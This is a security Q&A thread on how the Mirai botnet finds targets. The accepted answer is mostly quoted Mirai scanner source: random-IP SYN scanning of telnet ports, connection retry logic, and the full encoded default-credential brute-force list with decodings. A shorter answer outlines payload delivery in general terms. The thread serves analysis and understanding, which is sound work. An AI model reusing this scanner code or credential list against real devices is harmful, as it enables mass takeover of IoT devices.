# How Mirai scans or find targets

Tags: botnet

I read some articles about the [Mirai botnet](https://en.wikipedia.org/wiki/Mirai_(malware)).
I can't understand how Mirai scans/finds IoT devices.
Does Mirai scan the entire public IP range with an open telnet port and try to log in?

Answer (score 1, accepted):

The original Mirai looks for devices with busybox installed. This answer is directed at the original Mirai. As you know [Mirai source codes](https://github.com/lestertang/mirai-botnet-source-code/) are now public and it is not surprising to see variants of Mirai in the wild performing different if not more sophisticated attacks.

If you like to know how Mirai communicates with it's C&C. Check out similar question ["How does Mirai's C&C communicate with its bots?"](https://security.stackexchange.com/questions/151507/how-does-mirais-cc-communicate-with-its-bots).

Here instead is the explanation on "How Mirai Targets."

1. SYN scanning on socket is done and traversing accross various target IP addresses. It's used because it's fast and the ability to probe multiple ports

   ```
   // Set up raw socket scanning and payload
   if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
   {
   #ifdef DEBUG
       printf("[scanner] Failed to initialize raw socket, cannot scan\n");
   #endif
       exit(0);
   }
   ```
2. Getting responses

   ```
       if (fake_time != last_spew)
       {
           last_spew = fake_time;

           for (i = 0; i < SCANNER_RAW_PPS; i++)
           {
               struct sockaddr_in paddr = {0};
               struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
               struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

               iph->id = rand_next();
               iph->saddr = LOCAL_ADDR;
               iph->daddr = get_random_ip();
               iph->check = 0;
               iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

               if (i % 10 == 0)
               {
                   tcph->dest = htons(2323);
               }
               else
               {
                   tcph->dest = htons(23);
               }
               tcph->seq = iph->daddr;
               tcph->check = 0;
               tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));

               paddr.sin_family = AF_INET;
               paddr.sin_addr.s_addr = iph->daddr;
               paddr.sin_port = tcph->dest;

               sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
           }
       }
   ```

   And getting random ip to target

   ```
   static ipv4_t get_random_ip(void)
   {
   uint32_t tmp;
   uint8_t o1, o2, o3, o4;
   do
   {
       tmp = rand_next();

       o1 = tmp & 0xff;
       o2 = (tmp >> 8) & 0xff;
       o3 = (tmp >> 16) & 0xff;
       o4 = (tmp >> 24) & 0xff;
   }
   while (o1 == 127 ||                             // 127.0.0.0/8      - Loopback
         (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
         (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
         (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
         (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
         (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
         (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
         (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
         (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
         (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
         (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
         (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
         (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
   );

   return INET_ADDR(o1,o2,o3,o4);
   }
   ```
3. Send ACK packet and receive the response from target and perform analysis if a port is open. Targeting TCP/23 and TCP/2323

   ```
   last_avail_conn = 0;
   while (TRUE)
   {
   int n;
   char dgram[1514];
   struct iphdr *iph = (struct iphdr *)dgram;
   struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
   struct scanner_connection *conn;

   errno = 0;
   n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
   if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
       break;

   if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
       continue;
   if (iph->daddr != LOCAL_ADDR)
       continue;
   if (iph->protocol != IPPROTO_TCP)
       continue;
   if (tcph->source != htons(23) && tcph->source != htons(2323))
       continue;
   if (tcph->dest != source_port)
       continue;
   if (!tcph->syn)
       continue;
   if (!tcph->ack)
       continue;
   if (tcph->rst)
       continue;
   if (tcph->fin)
       continue;
   if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
       continue;

   conn = NULL;
   for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
   {
       if (conn_table[n].state == SC_CLOSED)
       {
           conn = &conn_table[n];
           last_avail_conn = n;
           break;
       }
   }
   ```
4. Once the above are done. A TCP Session is then Established

   ```
       FD_ZERO(&fdset_rd);
       FD_ZERO(&fdset_wr);
       for (i = 0; i < SCANNER_MAX_CONNS; i++)
       {
           int timeout;

           conn = &conn_table[i];
           timeout = (conn->state > SC_CONNECTING ? 30 : 5);

           if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
           {
   #ifdef DEBUG
               printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
   #endif
               close(conn->fd);
               conn->fd = -1;

               // Retry
               if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
               {
                   if (++(conn->tries) == 10)
                   {
                       conn->tries = 0;
                       conn->state = SC_CLOSED;
                   }
                   else
                   {
                       setup_connection(conn);
   #ifdef DEBUG
                       printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
   #endif
                   }
               }
               else
               {
                   conn->tries = 0;
                   conn->state = SC_CLOSED;
               }
               continue;
           }
   ```
5. Password Enumeration

   ```
           if (FD_ISSET(conn->fd, &fdset_rd))
           {
               while (TRUE)
               {
                   int ret;

                   if (conn->state == SC_CLOSED)
                       break;

                   if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
                   {
                       memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
                       conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
                   }
                   errno = 0;
                   ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
                   if (ret == 0)
                   {
   #ifdef DEBUG
                       printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
   #endif
                       errno = ECONNRESET;
                       ret = -1; // Fall through to closing connection below
                   }
                   if (ret == -1)
                   {
                       if (errno != EAGAIN && errno != EWOULDBLOCK)
                       {
   #ifdef DEBUG
                           printf("[scanner] FD%d lost connection\n", conn->fd);
   #endif
                           close(conn->fd);
                           conn->fd = -1;

                           // Retry
                           if (++(conn->tries) >= 10)
                           {
                               conn->tries = 0;
                               conn->state = SC_CLOSED;
                           }
                           else
                           {
                               setup_connection(conn);
   #ifdef DEBUG
                               printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
   #endif
                           }
                       }
   ```
6. Attempts using common weak passwords and default passwords.

   ```
   add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);                     // root     xc3511
   add_auth_entry("\x50\x4D\x4D\x56", "\x54\x4B\x58\x5A\x54", 9);                          // root     vizxv
   add_auth_entry("\x50\x4D\x4D\x56", "\x43\x46\x4F\x4B\x4C", 8);                          // root     admin
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 7);                      // admin    admin
   add_auth_entry("\x50\x4D\x4D\x56", "\x1A\x1A\x1A\x1A\x1A\x1A", 6);                      // root     888888
   add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x4F\x4A\x46\x4B\x52\x41", 5);                  // root     xmhdipc
   add_auth_entry("\x50\x4D\x4D\x56", "\x46\x47\x44\x43\x57\x4E\x56", 5);                  // root     default
    add_auth_entry("\x50\x4D\x4D\x56", "\x48\x57\x43\x4C\x56\x47\x41\x4A", 5);              // root     juantech
   add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17\x14", 5);                      // root     123456
   add_auth_entry("\x50\x4D\x4D\x56", "\x17\x16\x11\x10\x13", 5);                          // root     54321
   add_auth_entry("\x51\x57\x52\x52\x4D\x50\x56", "\x51\x57\x52\x52\x4D\x50\x56", 5);      // support  support
   add_auth_entry("\x50\x4D\x4D\x56", "", 4);                                              // root     (none)
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 4);          // admin    password
   add_auth_entry("\x50\x4D\x4D\x56", "\x50\x4D\x4D\x56", 4);                              // root     root
   add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 4);                          // root     12345
   add_auth_entry("\x57\x51\x47\x50", "\x57\x51\x47\x50", 3);                              // user     user
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "", 3);                                          // admin    (none)
   add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51", 3);                              // root     pass
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C\x13\x10\x11\x16", 3);      // admin    admin1234
   add_auth_entry("\x50\x4D\x4D\x56", "\x13\x13\x13\x13", 3);                              // root     1111
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x51\x4F\x41\x43\x46\x4F\x4B\x4C", 3);          // admin    smcadmin
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13", 2);                          // admin    1111
   add_auth_entry("\x50\x4D\x4D\x56", "\x14\x14\x14\x14\x14\x14", 2);                      // root     666666
   add_auth_entry("\x50\x4D\x4D\x56", "\x52\x43\x51\x51\x55\x4D\x50\x46", 2);              // root     password
   add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16", 2);                              // root     1234
   add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11", 1);                      // root     klv123
   add_auth_entry("\x63\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x4F\x47\x4B\x4C\x51\x4F", 1); // Administrator admin
   add_auth_entry("\x51\x47\x50\x54\x4B\x41\x47", "\x51\x47\x50\x54\x4B\x41\x47", 1);      // service  service
   add_auth_entry("\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", "\x51\x57\x52\x47\x50\x54\x4B\x51\x4D\x50", 1); // supervisor supervisor
   add_auth_entry("\x45\x57\x47\x51\x56", "\x45\x57\x47\x51\x56", 1);                      // guest    guest
   add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1);                      // guest    12345
   add_auth_entry("\x45\x57\x47\x51\x56", "\x13\x10\x11\x16\x17", 1);                      // guest    12345
   add_auth_entry("\x43\x46\x4F\x4B\x4C\x13", "\x52\x43\x51\x51\x55\x4D\x50\x46", 1);      // admin1   password
   add_auth_entry("\x43\x46\x4F\x4B\x4C\x4B\x51\x56\x50\x43\x56\x4D\x50", "\x13\x10\x11\x16", 1); // administrator 1234
   add_auth_entry("\x14\x14\x14\x14\x14\x14", "\x14\x14\x14\x14\x14\x14", 1);              // 666666   666666
   add_auth_entry("\x1A\x1A\x1A\x1A\x1A\x1A", "\x1A\x1A\x1A\x1A\x1A\x1A", 1);              // 888888   888888
   add_auth_entry("\x57\x40\x4C\x56", "\x57\x40\x4C\x56", 1);                              // ubnt     ubnt
   add_auth_entry("\x50\x4D\x4D\x56", "\x49\x4E\x54\x13\x10\x11\x16", 1);                  // root     klv1234
   add_auth_entry("\x50\x4D\x4D\x56", "\x78\x56\x47\x17\x10\x13", 1);                      // root     Zte521
   add_auth_entry("\x50\x4D\x4D\x56", "\x4A\x4B\x11\x17\x13\x1A", 1);                      // root     hi3518
   add_auth_entry("\x50\x4D\x4D\x56", "\x48\x54\x40\x58\x46", 1);                          // root     jvbzd
   add_auth_entry("\x50\x4D\x4D\x56", "\x43\x4C\x49\x4D", 4);                              // root     anko
   add_auth_entry("\x50\x4D\x4D\x56", "\x58\x4E\x5A\x5A\x0C", 1);                          // root     zlxx.
   add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x54\x4B\x58\x5A\x54", 1); // root     7ujMko0vizxv
   add_auth_entry("\x50\x4D\x4D\x56", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // root     7ujMko0admin
   add_auth_entry("\x50\x4D\x4D\x56", "\x51\x5B\x51\x56\x47\x4F", 1);                      // root     system
   add_auth_entry("\x50\x4D\x4D\x56", "\x4B\x49\x55\x40", 1);                              // root     ikwb
   add_auth_entry("\x50\x4D\x4D\x56", "\x46\x50\x47\x43\x4F\x40\x4D\x5A", 1);              // root     dreambox
   add_auth_entry("\x50\x4D\x4D\x56", "\x57\x51\x47\x50", 1);                              // root     user
   add_auth_entry("\x50\x4D\x4D\x56", "\x50\x47\x43\x4E\x56\x47\x49", 1);                  // root     realtek
   add_auth_entry("\x50\x4D\x4D\x56", "\x12\x12\x12\x12\x12\x12\x12\x12", 1);              // root     00000000
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x13\x13\x13\x13\x13\x13", 1);              // admin    1111111
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16", 1);                          // admin    1234
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17", 1);                      // admin    12345
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x17\x16\x11\x10\x13", 1);                      // admin    54321
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x13\x10\x11\x16\x17\x14", 1);                  // admin    123456
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x15\x57\x48\x6F\x49\x4D\x12\x43\x46\x4F\x4B\x4C", 1); // admin    7ujMko0admin
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x16\x11\x10\x13", 1);                          // admin    1234
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51", 1);                          // admin    pass
   add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x4F\x47\x4B\x4C\x51\x4F", 1);                  // admin    meinsm
   add_auth_entry("\x56\x47\x41\x4A", "\x56\x47\x41\x4A", 1);                              // tech     tech
   add_auth_entry("\x4F\x4D\x56\x4A\x47\x50", "\x44\x57\x41\x49\x47\x50", 1);              // mother   f**ker
   ```

Answer (score -2):

I haven't been researching much about Mirai but similar malware is installed by just scanning the whole Internet for routers with a scanner for open telnet ports and brute-force it with default passwords.

After that it just uses a combination of "wget", "chmod" and "./" to execute the payload onto the target machine, in Mirai's case, router.